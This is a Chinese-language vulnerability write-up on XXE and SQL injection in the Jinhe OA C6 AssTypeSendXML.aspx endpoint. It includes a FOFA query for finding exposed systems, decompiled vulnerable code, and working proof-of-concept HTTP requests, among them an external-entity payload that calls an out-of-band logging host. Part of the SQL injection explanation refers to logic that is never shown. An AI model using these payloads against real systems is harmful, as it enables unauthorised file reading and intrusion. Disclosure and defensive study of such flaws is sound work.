漏洞简介
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和OA C6 AssTypeSendXML.aspx 接口处存在XXE漏洞,未授权的攻击者可以通过此漏洞读取服务器上敏感文件或探测内网服务信息,进一步利用可导致服务器失陷。
影响版本
金和OA C6
fofa语法
app="金和网络-金和OA"
漏洞分析
直接根据 AssTypeSendXML.aspx 在 bin 目录下查找 JHSoft.Web.Ask.dll 将其进行反编译后找到 AssTypeSendXML 的处理逻辑
protected void Page_Load(object sender, EventArgs e)
{
this.htc = ((CultureInfo) this.Session["culture"]).Name + ".css";
XmlDataDocument xmlDataDocument = new XmlDataDocument();
((XmlDocument) xmlDataDocument).Load(this.Request.InputStream);
请求内容直接使 xmlDataDocument.Load 解析,造成XXE漏洞。
同时存在SQL注入漏洞

对应 XML 输入满足以下条件即可:
- 第一节点(索引0)值为上述任意条件的字符串(如 "1"、"2"、"3"、"6"、"7"、"8"、"9"、"10")。
- 节点数量不足,导致无法为
str2赋值(即节点数小于3或4,具体见上面逻辑)。
漏洞复现
XXE
POST /c6/Jhsoft.Web.Asset/AssTypeSendXML.aspx/ HTTP/1.1
Host: jhsoft.mrxn.net
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://xxe.dnslog.pt/xxe_test">
%remote;]>
<root/>
在DNSLOG平台成功收到HTTP请求

SQL
POST /c6/Jhsoft.Web.Asset/AssTypeSendXML.aspx/ HTTP/1.1
Host: jhsoft.mrxn.net
Content-Type: application/xml
<root>
<type>2</type><assetTypeID>1001'SQLI_POC</assetTypeID>
</root>

成功延时 2 秒

